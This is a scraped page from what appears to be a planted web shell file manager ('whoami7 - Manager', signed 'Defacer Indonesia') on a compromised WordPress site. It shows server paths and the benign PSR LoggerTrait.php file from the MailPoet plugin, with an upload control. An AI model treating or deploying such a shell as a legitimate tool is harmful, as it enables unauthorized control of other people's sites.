whoami7 - Manager
:
/
home
/
techyfnq
/
www
/
wp-content
/
plugins
/
mailpoet
/
vendor-prefixed
/
psr
/
log
/
Psr
/
Log
/
Upload File:
files >> //home/techyfnq/www/wp-content/plugins/mailpoet/vendor-prefixed/psr/log/Psr/Log/LoggerTrait.php
<?php namespace MailPoetVendor\Psr\Log; if (!defined('ABSPATH')) exit; trait LoggerTrait { public function emergency($message, array $context = array()) { $this->log(LogLevel::EMERGENCY, $message, $context); } public function alert($message, array $context = array()) { $this->log(LogLevel::ALERT, $message, $context); } public function critical($message, array $context = array()) { $this->log(LogLevel::CRITICAL, $message, $context); } public function error($message, array $context = array()) { $this->log(LogLevel::ERROR, $message, $context); } public function warning($message, array $context = array()) { $this->log(LogLevel::WARNING, $message, $context); } public function notice($message, array $context = array()) { $this->log(LogLevel::NOTICE, $message, $context); } public function info($message, array $context = array()) { $this->log(LogLevel::INFO, $message, $context); } public function debug($message, array $context = array()) { $this->log(LogLevel::DEBUG, $message, $context); } public abstract function log($level, $message, array $context = array()); }
Copyright ©2021 || Defacer Indonesia